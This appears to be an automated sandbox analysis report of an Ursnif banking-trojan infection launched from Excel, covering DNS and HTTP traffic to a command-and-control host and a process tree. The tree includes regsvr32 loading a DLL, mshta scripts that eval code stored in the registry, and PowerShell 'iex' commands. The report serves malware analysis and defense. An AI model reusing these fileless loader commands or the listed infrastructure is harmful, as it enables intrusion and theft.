                                                                                                                                                            Jul 8, 2021 15:47:56.673897028 CEST5830653192.168.2.38.8.8.8
                                                                                                                                                            Jul 8, 2021 15:47:56.686563969 CEST53583068.8.8.8192.168.2.3
                                                                                                                                                            Jul 8, 2021 15:47:57.634944916 CEST6412453192.168.2.38.8.8.8
                                                                                                                                                            Jul 8, 2021 15:47:57.648574114 CEST53641248.8.8.8192.168.2.3
                                                                                                                                                            Jul 8, 2021 15:47:58.478595018 CEST4936153192.168.2.38.8.8.8
                                                                                                                                                            Jul 8, 2021 15:47:58.491975069 CEST53493618.8.8.8192.168.2.3
                                                                                                                                                            Jul 8, 2021 15:47:59.530437946 CEST6315053192.168.2.38.8.8.8
                                                                                                                                                            Jul 8, 2021 15:47:59.543267965 CEST53631508.8.8.8192.168.2.3

ICMP Packets

Timestamp | Source IP | Dest IP | Checksum | Code | Type
Jul 8, 2021 15:46:50.491585970 CEST | 192.168.2.3 | 8.8.8.8 | d004 | (Port unreachable) | Destination Unreachable

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Jul 8, 2021 15:45:12.538357973 CEST | 192.168.2.3 | 8.8.8.8 | 0x921f | Standard query (0) | free.mynowministries.com | A (IP address) | IN (0x0001)
Jul 8, 2021 15:46:46.216243029 CEST | 192.168.2.3 | 8.8.8.8 | 0xffeb | Standard query (0) | gtr.antoinfer.com | A (IP address) | IN (0x0001)
Jul 8, 2021 15:46:47.222793102 CEST | 192.168.2.3 | 8.8.8.8 | 0xffeb | Standard query (0) | gtr.antoinfer.com | A (IP address) | IN (0x0001)
Jul 8, 2021 15:47:30.710268974 CEST | 192.168.2.3 | 8.8.8.8 | 0x45dc | Standard query (0) | gtr.antoinfer.com | A (IP address) | IN (0x0001)
Jul 8, 2021 15:47:32.668920040 CEST | 192.168.2.3 | 8.8.8.8 | 0xf55 | Standard query (0) | gtr.antoinfer.com | A (IP address) | IN (0x0001)
Jul 8, 2021 15:47:35.493366003 CEST | 192.168.2.3 | 8.8.8.8 | 0xb150 | Standard query (0) | gtr.antoinfer.com | A (IP address) | IN (0x0001)
Jul 8, 2021 15:47:37.660630941 CEST | 192.168.2.3 | 8.8.8.8 | 0x314c | Standard query (0) | gtr.antoinfer.com | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Jul 8, 2021 15:45:12.660362959 CEST | 8.8.8.8 | 192.168.2.3 | 0x921f | No error (0) | free.mynowministries.com |  | 162.241.253.78 | A (IP address) | IN (0x0001)
Jul 8, 2021 15:46:47.505951881 CEST | 8.8.8.8 | 192.168.2.3 | 0xffeb | No error (0) | gtr.antoinfer.com |  | 165.232.183.49 | A (IP address) | IN (0x0001)
Jul 8, 2021 15:46:50.491420984 CEST | 8.8.8.8 | 192.168.2.3 | 0xffeb | No error (0) | gtr.antoinfer.com |  | 165.232.183.49 | A (IP address) | IN (0x0001)
Jul 8, 2021 15:47:30.725452900 CEST | 8.8.8.8 | 192.168.2.3 | 0x45dc | No error (0) | gtr.antoinfer.com |  | 165.232.183.49 | A (IP address) | IN (0x0001)
Jul 8, 2021 15:47:32.682585955 CEST | 8.8.8.8 | 192.168.2.3 | 0xf55 | No error (0) | gtr.antoinfer.com |  | 165.232.183.49 | A (IP address) | IN (0x0001)
Jul 8, 2021 15:47:35.783593893 CEST | 8.8.8.8 | 192.168.2.3 | 0xb150 | No error (0) | gtr.antoinfer.com |  | 165.232.183.49 | A (IP address) | IN (0x0001)
Jul 8, 2021 15:47:37.674045086 CEST | 8.8.8.8 | 192.168.2.3 | 0x314c | No error (0) | gtr.antoinfer.com |  | 165.232.183.49 | A (IP address) | IN (0x0001)

HTTP Request Dependency Graph

• gtr.antoinfer.com

HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.3 | 49755 | 165.232.183.49 | 80 | C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp | kBytes transferred | Direction | Data
Jul 8, 2021 15:46:47.694397926 CEST | 6994 | OUT | GET /7lD6H27N_2/BPcjmtAv0Zw4YWBW5/_2Fxf1uK6WCO/_2Fjr90UDnf/fvsahgiWLN_2Bo/Vmn_2FfIBHwVISTOJqyyE/yxzQpB4UhTtBihgn/15wt67RuhdWC2bp/AA4QTb7hSSc7ibwOLz/pdYBrbn9P/IhNkxf132wscOBr5M107/x3K_2BnAOaEK3ZrGH_2/BhQbh5Iq3KL0HGqeYocdUa/aitTSocVb3Ei8/K8Yn7wxH/8ZzNnAARdlf1lpPkD_2FTSI/88hMX1xgXx/WKheFQm4ijbivR_2F/Zqk2tiAD1SrE/7_2FLrw5q4N/ROSXMe9TmWNzIt/lpE2Vas7vRgwYKuDJRzfN/M8anWcq HTTP/1.1
Accept: text/html, application/xhtml+xml, image/jxr, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: gtr.antoinfer.com
Connection: Keep-Alive
Jul 8, 2021 15:46:48.628479958 CEST | 6995 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 08 Jul 2021 13:46:48 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
Strict-Transport-Security: max-age=63072000; includeSubdomains
X-Content-Type-Options: nosniff
Content-Encoding: gzip


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.3 | 49754 | 165.232.183.49 | 80 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
Timestamp | kBytes transferred | Direction | Data
Jul 8, 2021 15:46:50.205321074 CEST | 7200 | OUT | GET /favicon.ico HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: gtr.antoinfer.com
Connection: Keep-Alive
Jul 8, 2021 15:46:50.737088919 CEST | 7201 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 08 Jul 2021 13:46:50 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
Content-Encoding: gzip


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.3 | 49757 | 165.232.183.49 | 80 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
Timestamp | kBytes transferred | Direction | Data
Jul 8, 2021 15:47:30.909945011 CEST | 7205 | OUT | GET /xFDxUxdbnv/F6OYsZZ54L9nW_2Fn/67TmggSh_2FJ/XC_2BJ4ptUf/_2Bn4_2BufrBke/X9TaUVAWE43KR_2BAaOOd/VFdvQg3iI5nNB7ro/WwH2QRd3S4Jpyvs/BAGj3S8XfXokbtiE7i/hiopX3wKc/HclUJ6ir4iZ2Wbahh_2F/U4T4cSpeeoulqiraG2L/OcnB_2BpDFDp4gpBC5Tkhs/w68xYDIGC4qQh/4p7XqKDy/ZmjFv4NCLUhiS0t8WoyKwxb/hab8TjugII/SNATkC5REfp7kWCrA/g3JBPajXKX1i/qwbd_2FPu7J/lLmh_2BCbPNt2x/W33zXC7gkL52CnQJHgKW5/o596c7z HTTP/1.1
Accept: text/html, application/xhtml+xml, image/jxr, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: gtr.antoinfer.com
Connection: Keep-Alive
Jul 8, 2021 15:47:31.798994064 CEST | 7207 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 08 Jul 2021 13:47:31 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
Strict-Transport-Security: max-age=63072000; includeSubdomains
X-Content-Type-Options: nosniff
Content-Encoding: gzip


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
3 | 192.168.2.3 | 49759 | 165.232.183.49 | 80 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
Timestamp | kBytes transferred | Direction | Data
Jul 8, 2021 15:47:32.851699114 CEST | 7370 | OUT | GET /k_2Bld_2B868iR7p/iSLerqiJRFRfRPj/I3sykOYq_2B_2BHlkm/lN1n6_2F_/2BoCebPKrVZFk5Ykbc8d/ir2ifxTr4LNwVXB57AO/naMzNC0NRqAZpafqf_2BA_/2Be4kMQ_2Bs4v/p3vimkya/tnJRXZOQhgPrD4eJIIoOBmz/6_2FqS0VmH/GdEp4ZZJMOcj3fIll/Gr7XyTEKPabp/aWzveP_2B5R/CbkrZ6KMbYewce/4JBfvb8ftJcY5XJZOep1x/uKyVwvTYfdKUGuNG/Emm_2BOgQKRpwFp/DFm1TypwhIB6euZx4o/ZnwoOdebK/P2zkNdJ1mC1FOPRaBbHj/tGtvylAtqDtqZZGz2/K HTTP/1.1
Accept: text/html, application/xhtml+xml, image/jxr, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: gtr.antoinfer.com
Connection: Keep-Alive
Jul 8, 2021 15:47:33.792424917 CEST | 7414 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 08 Jul 2021 13:47:33 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
Strict-Transport-Security: max-age=63072000; includeSubdomains
X-Content-Type-Options: nosniff
Content-Encoding: gzip


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
4 | 192.168.2.3 | 49756 | 165.232.183.49 | 80 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
Timestamp | kBytes transferred | Direction | Data
Jul 8, 2021 15:47:33.259176970 CEST | 7413 | OUT | GET /favicon.ico HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: gtr.antoinfer.com
Connection: Keep-Alive
Jul 8, 2021 15:47:33.771099091 CEST | 7413 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 08 Jul 2021 13:47:33 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
Content-Encoding: gzip


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
5 | 192.168.2.3 | 49760 | 165.232.183.49 | 80 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
Timestamp | kBytes transferred | Direction | Data
Jul 8, 2021 15:47:35.972897053 CEST | 7677 | OUT | GET /MpeUKSeGn_2/Bk4DEtluQu8Y9R/36MpR_2BhUMN_2FXN2dO6/hANnmINzHP5reb6i/6KJxoqvLxdOtysJ/n0kMUo2t6MOWkWv9fh/vWxI1agPy/wQGFAQHZyVrGmWgCFodY/7FxYiI_2B53c0enExOR/GrTPqZ6XXPPo3SV3TEozm4/Exzy5YwFrUkYs/bQh_2FMD/0GOF4z17cCRm_2Fd6CEZwMn/XbmChIoDCR/BVkOjJKAuaNi81j2s/DAsZ7IX3Y_2F/9MNFRd8bZDE/rF3vDAxY3XVSH_/2BRf6xlnVaI7w67ANQeYN/HlP9zkWlJUqCL5u9/iWI0VgGL0n3Ke_2/BO2nUtcdX/UZ97 HTTP/1.1
Accept: text/html, application/xhtml+xml, image/jxr, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: gtr.antoinfer.com
Connection: Keep-Alive
Jul 8, 2021 15:47:36.880944967 CEST | 7679 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 08 Jul 2021 13:47:36 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
Strict-Transport-Security: max-age=63072000; includeSubdomains
X-Content-Type-Options: nosniff
Content-Encoding: gzip


Session ID: 6 | Source IP: 192.168.2.3 | Source Port: 49762 | Destination IP: 165.232.183.49 | Destination Port: 80 | Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp: Jul 8, 2021 15:47:37.855365038 CEST | kBytes transferred: 7824 | Direction: OUT
GET /IW0KvL6zqxcwdal5Ue/sV05YuqDL/CUY_2FYXWgTEAN2MleRL/cOthmAfIFOrxcxXsh59/7AJjgFXMm7GK3zI8vuZf8x/2APU8PDwtmpAr/ANYuz5rb/u_2Ba0GWu8ipmpUp8uWalIe/b1DgDagPuJ/QMf4e8CmCgrJh1KOA/BEoe0WcWQ2Nu/avlRE03_2BA/ikzAyiPbN_2BHy/_2BYBLI5BgaFwR91PIKzH/SJ1rXSKpXvP3w4_2/BgNlAxmgSpCbzA3/rA6BVOnt_2Fs0ge7Ub/mZV_2ByZe/27QR_2F_2BkAwlW65Zcm/dBBVfaC3K9GAjFa76dp/yXioP6kRbgfKWsmcnd8JPP/othn HTTP/1.1
Accept: text/html, application/xhtml+xml, image/jxr, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: gtr.antoinfer.com
Connection: Keep-Alive

Timestamp: Jul 8, 2021 15:47:38.766030073 CEST | kBytes transferred: 7942 | Direction: IN
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 08 Jul 2021 13:47:38 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
Strict-Transport-Security: max-age=63072000; includeSubdomains
X-Content-Type-Options: nosniff
Content-Encoding: gzip


Session ID: 7 | Source IP: 192.168.2.3 | Source Port: 49761 | Destination IP: 165.232.183.49 | Destination Port: 80 | Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp: Jul 8, 2021 15:47:39.574058056 CEST | kBytes transferred: 7943 | Direction: OUT
GET /h_2F93afXj4zv0agU5uGcex/4RttysT472/M4H0F6I1ZWhRsl9Mq/gKfk1C7c8_2F/gareL3qIHQG/CB4JNANcQf7aA7/T_2FdtzxTEW5qEGgXi5de/wQDU_2FVQ9AqPhgZ/QBiqWLaZem_2BhU/Ub_2Bbrgr7V1ABDC_2/FRiGY94s4/Mw6BG5UCBUeOPfAvsqhw/LTDXh6l0kPjcKC2fY3f/eXzxQUf3im0jBAcOxzjmlM/t_2BlYZFFpOnU/rPHW4IFe/pXsS9omB7zF_2B_2BEp_2BV/Ya9nAT6p4X/2ixawH6C4M4LLI7hR/_2BGNe0TQDy_/2FBKn745niy/_2BRADxlO6wxP1/zz_2BWqAzRaI/gWg HTTP/1.1
Accept: text/html, application/xhtml+xml, image/jxr, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: gtr.antoinfer.com
Connection: Keep-Alive

Timestamp: Jul 8, 2021 15:47:40.508263111 CEST | kBytes transferred: 7945 | Direction: IN
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 08 Jul 2021 13:47:40 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
Strict-Transport-Security: max-age=63072000; includeSubdomains
X-Content-Type-Options: nosniff
Content-Encoding: gzip


                                                                                                                                                            HTTPS Packets

Timestamp: Jul 8, 2021 15:45:12.935718060 CEST | Source IP: 162.241.253.78 | Source Port: 443 | Dest IP: 192.168.2.3 | Dest Port: 49725
JA3 SSL Client Fingerprint: 771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0
JA3 SSL Client Digest: 37f463bf4616ecd445d4a1937da06e19
Certificate chain (Subject | Issuer | Not Before | Not After):
CN=www.free.mynowministries.com | CN=R3, O=Let's Encrypt, C=US | Tue Jun 15 19:07:00 CEST 2021 | Mon Sep 13 19:06:59 CEST 2021
CN=R3, O=Let's Encrypt, C=US | CN=ISRG Root X1, O=Internet Security Research Group, C=US | Fri Sep 04 02:00:00 CEST 2020 | Mon Sep 15 18:00:00 CEST 2025
CN=ISRG Root X1, O=Internet Security Research Group, C=US | CN=DST Root CA X3, O=Digital Signature Trust Co. | Wed Jan 20 20:14:03 CET 2021 | Mon Sep 30 20:14:03 CEST 2024

                                                                                                                                                            Code Manipulations

                                                                                                                                                            Statistics

                                                                                                                                                            Behavior

                                                                                                                                                            System Behavior

                                                                                                                                                            General

                                                                                                                                                            Start time:15:45:08
                                                                                                                                                            Start date:08/07/2021
                                                                                                                                                            Path:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
                                                                                                                                                            Imagebase:0x3f0000
                                                                                                                                                            File size:27110184 bytes
                                                                                                                                                            MD5 hash:5D6638F2C8F8571C593999C58866007E
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Reputation:high

                                                                                                                                                            General

                                                                                                                                                            Start time:15:45:13
                                                                                                                                                            Start date:08/07/2021
                                                                                                                                                            Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:regsvr32 -s C:\Users\Public\Documents\decrypt.dll
                                                                                                                                                            Imagebase:0xfc0000
                                                                                                                                                            File size:20992 bytes
                                                                                                                                                            MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Yara matches:
                                                                                                                                                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.411957077.0000000004E08000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.411794580.0000000004E08000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.411858229.0000000004E08000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.411885260.0000000004E08000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.472132410.0000000004B0E000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.411972809.0000000004E08000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.429184025.0000000004C0C000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.428651984.0000000004D89000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.411764136.0000000004E08000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.411824879.0000000004E08000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.411905435.0000000004E08000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                            Reputation:high

                                                                                                                                                            General

                                                                                                                                                            Start time:15:46:33
                                                                                                                                                            Start date:08/07/2021
                                                                                                                                                            Path:C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit):true
Commandline:regsvr32 -s C:\Users\Public\Documents\decrypt.dll
Imagebase:0xfc0000
File size:20992 bytes
MD5 hash:426E7499F6A7346F0410DEAD0805586B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000013.00000003.508793933.0000000005738000.00000004.00000040.sdmp, Author: Joe Security
• Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000013.00000003.508759247.0000000005738000.00000004.00000040.sdmp, Author: Joe Security
• Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000013.00000003.508819476.0000000005738000.00000004.00000040.sdmp, Author: Joe Security
• Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000013.00000003.508778168.0000000005738000.00000004.00000040.sdmp, Author: Joe Security
• Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000013.00000003.531333562.000000000553C000.00000004.00000040.sdmp, Author: Joe Security
• Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000013.00000003.508710785.0000000005738000.00000004.00000040.sdmp, Author: Joe Security
• Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000013.00000003.520271501.00000000056B9000.00000004.00000040.sdmp, Author: Joe Security
• Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000013.00000003.508809489.0000000005738000.00000004.00000040.sdmp, Author: Joe Security
• Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000013.00000003.508736134.0000000005738000.00000004.00000040.sdmp, Author: Joe Security
• Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000013.00000003.508679200.0000000005738000.00000004.00000040.sdmp, Author: Joe Security
Reputation:high

General

Start time:15:46:43
Start date:08/07/2021
Path:C:\Program Files\internet explorer\iexplore.exe
Wow64 process (32bit):false
Commandline:'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Imagebase:0x7ff6ab5e0000
File size:823560 bytes
MD5 hash:6465CB92B25A7BC1DF8E01D8AC5E7596
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

General

Start time:15:46:44
Start date:08/07/2021
Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):true
Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5008 CREDAT:17410 /prefetch:2
Imagebase:0xb40000
File size:822536 bytes
MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

General

Start time:15:47:28
Start date:08/07/2021
Path:C:\Program Files\internet explorer\iexplore.exe
Wow64 process (32bit):false
Commandline:'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Imagebase:0x7ff6ab5e0000
File size:823560 bytes
MD5 hash:6465CB92B25A7BC1DF8E01D8AC5E7596
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

General

Start time:15:47:29
Start date:08/07/2021
Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):true
Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5500 CREDAT:17410 /prefetch:2
Imagebase:0xb40000
File size:822536 bytes
MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

General

Start time:15:47:31
Start date:08/07/2021
Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):true
Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5500 CREDAT:17416 /prefetch:2
Imagebase:0xb40000
File size:822536 bytes
MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

General

Start time:15:47:34
Start date:08/07/2021
Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):true
Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5500 CREDAT:82956 /prefetch:2
Imagebase:0xb40000
File size:822536 bytes
MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

General

Start time:15:47:36
Start date:08/07/2021
Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):true
Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5500 CREDAT:17428 /prefetch:2
Imagebase:0xb40000
File size:822536 bytes
MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language

General

Start time:15:47:43
Start date:08/07/2021
Path:C:\Windows\System32\mshta.exe
Wow64 process (32bit):false
Commandline:'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Copx='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Copx).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>'
Imagebase:0x7ff6dddb0000
File size:14848 bytes
MD5 hash:197FC97C6A843BEBB445C1D9C58DCBDB
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language

General

Start time:15:47:44
Start date:08/07/2021
Path:C:\Windows\System32\mshta.exe
Wow64 process (32bit):false
Commandline:'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Hl1h='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Hl1h).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>'
Imagebase:0x7ff6dddb0000
File size:14848 bytes
MD5 hash:197FC97C6A843BEBB445C1D9C58DCBDB
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language

General

Start time:15:47:45
Start date:08/07/2021
Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):false
Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
Imagebase:0x7ff785e30000
File size:447488 bytes
MD5 hash:95000560239032BC68B4C2FDFCDEF913
Has elevated privileges:true
Has administrator privileges:true
Programmed in:.Net C# or VB.NET

General

Start time:15:47:45
Start date:08/07/2021
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff6b2800000
File size:625664 bytes
MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language

General

Start time:15:47:46
Start date:08/07/2021
Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):false
Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
Imagebase:0x7ff785e30000
File size:447488 bytes
MD5 hash:95000560239032BC68B4C2FDFCDEF913
Has elevated privileges:true
Has administrator privileges:true
Programmed in:.Net C# or VB.NET

General

Start time:15:47:46
Start date:08/07/2021
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff6b2800000
File size:625664 bytes
MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:true
Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                                            General

                                                                                                                                                            Start time:15:47:57
                                                                                                                                                            Start date:08/07/2021
                                                                                                                                                            Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\zctvvvtu\zctvvvtu.cmdline'
                                                                                                                                                            Imagebase:0x7ff62b250000
                                                                                                                                                            File size:2739304 bytes
                                                                                                                                                            MD5 hash:B46100977911A0C9FB1C3E5F16A5017D
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:.Net C# or VB.NET

                                                                                                                                                            General

                                                                                                                                                            Start time:15:47:57
                                                                                                                                                            Start date:08/07/2021
                                                                                                                                                            Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\a2r2fkec\a2r2fkec.cmdline'
                                                                                                                                                            Imagebase:0x7ff62b250000
                                                                                                                                                            File size:2739304 bytes
                                                                                                                                                            MD5 hash:B46100977911A0C9FB1C3E5F16A5017D
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:.Net C# or VB.NET

                                                                                                                                                            Disassembly

                                                                                                                                                            Code Analysis
